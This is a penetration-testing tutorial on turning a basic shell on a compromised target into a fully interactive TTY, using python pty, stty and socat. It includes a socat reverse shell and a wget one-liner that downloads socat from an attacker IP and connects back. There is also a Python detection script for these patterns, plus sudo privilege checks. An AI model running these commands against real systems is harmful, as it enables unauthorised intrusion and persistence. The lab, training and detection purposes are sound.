Upgrade Shells to Fully Interactive

Upgrading the shell to a fully interactive one

Upgrading shells is a crucial step after gaining initial access to a target system. A fully interactive shell provides better stability, functionality, and usability for post-exploitation activities.

Basic Python PTY Method

The most common and reliable method uses Python's PTY module:

# Python 2
python -c 'import pty; pty.spawn("/bin/bash")'

# Python 3
python3 -c 'import pty; pty.spawn("/bin/bash")'

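This gives the shell a pseudo-terminal, but the upgrade is only partial: the local terminal is still in its default mode, so tab completion, arrow keys and Ctrl+C are handled locally instead of being passed to the remote shell.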

Complete TTY Shell Upgrade

The full process involves four steps:

Step 1: Get a Basic Shell with Python

python3 -c 'import pty; pty.spawn("/bin/bash")'

Step 2: Background the Shell

# Press Ctrl+Z to background the session

Step 3: Configure Local Terminal Settings

# In your local terminal
stty raw -echo
fg

Note: After typing fg, press Enter twice

Step 4: Configure Remote Terminal Settings

# In the remote shell
export SHELL=bash
export TERM=xterm-256color
stty rows 38 columns 116

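The terminal dimensions (rows 38 columns 116) are an example and should match your local terminal. Run the following in a local terminal, not in the remote shell; it prints the rows first, then the columns: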

# Check your local terminal dimensions
stty size

Alternative Methods

Using Socat for Full TTY

First, transfer the socat binary to the target system. Then:

# On your attack machine
socat file:`tty`,raw,echo=0 tcp-listen:4445

# On the target
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.16.9:4445

For targets without socat installed:

# Transfer socat and create connection in one line
wget -q http://10.10.16.9:9090/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.16.9:4445

Using Script Utility

# Another method for shell upgrade
script /dev/null -c bash

Common Issues and Solutions

No Python Available

If Python isn't available, try:

# Using script
script /dev/null -c bash

# Using expect
expect -c 'spawn bash; interact'

# Using perl (this only replaces the current process with bash; it does not allocate a PTY)
perl -e 'exec "/bin/bash";'
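
Each of the PTY-allocating commands above leaves a distinctive process command line. The following is an added example, not part of the original page: a Python triage function that flags those command lines in process-creation events and rates a hit higher when the process has no controlling terminal. The event layout (tty, command line), the rule names and the sample events are assumptions constructed for illustration.

```python
import os
import re
import shlex

NO_TTY = {"?", "(none)"}  # "no controlling terminal" as shown by ps and auditd

def classify(cmdline):
    """Name the PTY-upgrade pattern from this page that cmdline matches, else None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes, e.g. a truncated log field
        argv = cmdline.split()
    if not argv:
        return None
    prog, args = os.path.basename(argv[0]), argv[1:]
    body = " ".join(args)
    if re.fullmatch(r"python[\d.]*", prog) and "-c" in args and re.search(r"\bpty\.spawn\s*\(", body):
        return "python-pty-spawn"
    if prog == "script" and "/dev/null" in args:
        return "script-devnull"
    if prog == "socat" and any(re.match(r"(exec|system):.*,pty\b", a, re.I) for a in args):
        return "socat-exec-pty"
    if prog == "expect" and "-c" in args and re.search(r"\bspawn\b.*\binteract\b", body):
        return "expect-spawn-interact"
    return None

def triage(events):
    """events: (tty, cmdline) pairs. Return (severity, rule, cmdline) per match."""
    hits = []
    for tty, cmdline in events:
        rule = classify(cmdline)
        if rule:
            # A process with no terminal asking for a PTY is the situation this page
            # describes; the same command typed at pts/N is more likely routine use.
            hits.append(("high" if tty in NO_TTY else "low", rule, cmdline))
    return hits

# Constructed sample events (tty, command line); not taken from a real host.
SAMPLE = [
    ("?", """python3 -c 'import pty; pty.spawn("/bin/bash")'"""),
    ("?", "script /dev/null -c bash"),
    ("(none)", "/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.0.2.10:4445"),
    ("?", "expect -c 'spawn bash; interact'"),
    ("pts/0", "script /dev/null -c bash"),
    ("?", "perl -e 'exec \"/bin/bash\";'"),  # allocates no PTY, so no rule fires
]

if __name__ == "__main__":
    for sev, rule, cmd in triage(SAMPLE):
        print(f"{sev:4} {rule:22} {cmd}")
```

In practice the (tty, command line) pairs would come from whatever process-creation telemetry the host already produces; the matching logic does not depend on the source.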

Resetting Terminal After Failed Upgrade

If your terminal display becomes corrupted:

# Type blindly
reset

TTY Settings on Different Shells

For non-bash shells:

# For zsh
export SHELL=zsh
export TERM=xterm-256color

# For sh (more limited)
export TERM=xterm

Testing Shell Functionality

After upgrading, verify the shell functionality:

# Test command history: press the up arrow to view previous commands

# Test tab completion
ls /etc/[press Tab]

# Test job control
sleep 5 &
jobs

# Test signal handling: press Ctrl+C to stop a running command

Maintaining Access

Once you have an interactive shell, consider:

# Checking current user privileges
sudo -l

# Elevating to root with a known password (sudo -S reads the password from standard input)
echo "your_password" | sudo -S -i
